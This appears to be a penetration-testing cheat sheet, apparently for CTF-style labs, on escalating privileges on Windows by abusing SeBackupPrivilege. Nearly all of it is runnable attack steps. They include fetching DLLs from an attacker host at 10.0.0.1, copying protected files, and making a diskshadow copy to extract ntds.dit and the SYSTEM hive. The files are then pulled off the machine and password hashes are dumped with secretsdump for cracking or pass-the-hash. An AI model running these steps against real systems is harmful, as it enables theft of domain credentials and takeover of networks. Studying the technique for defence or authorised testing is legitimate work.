Windows PrivEsc with SeBackupPrivilege

SeBackupPrivilege allows users to retrieve file contents.

Investigation

First check if the current user has SeBackupPrivilege in the privilege information.

whoami /all

If so, we can read arbitrary files on the system include administrator's files, SAML file, SYSTEM registry file, etc.


Exploitation (Read Sensitive Files)

1. Download & Upload Malicious DLLs

In local machine, download malicious dlls from here

# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm,
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Set-SeBackupPrivilege
Get-SeBackupPrivilege

2. Copy & Read Sensitive Files

Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite


Exploitation (Retrieve Registry Keys)

1. Create a Payload and Transfer It

Create "diskshadow.txt" in local machine. It referes to this.

set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h:

Upload this file to remote machine. 

# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt
# If winrm,
upload diskshadow.txt

2. Execute DiskShadow.Exe

Then execute diskshadow.exe.

# /s: Specify the script file
diskshadow.exe /s .\diskshadow.txt

3. Upload Malicious DLL

We can download two dll files from here.

# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite

reg save HKLM\SYSTEM c:\tmp\system

download ntds.dit
download system

4. Dump Password Hashes

Now we have two files (ntds.dit and system) in local machine.
We can dump password hashes using the files.

impacket-secretsdump -ntds ntds.dit -system system LOCAL

After that, crack the hashes or use them for pass-the-hash.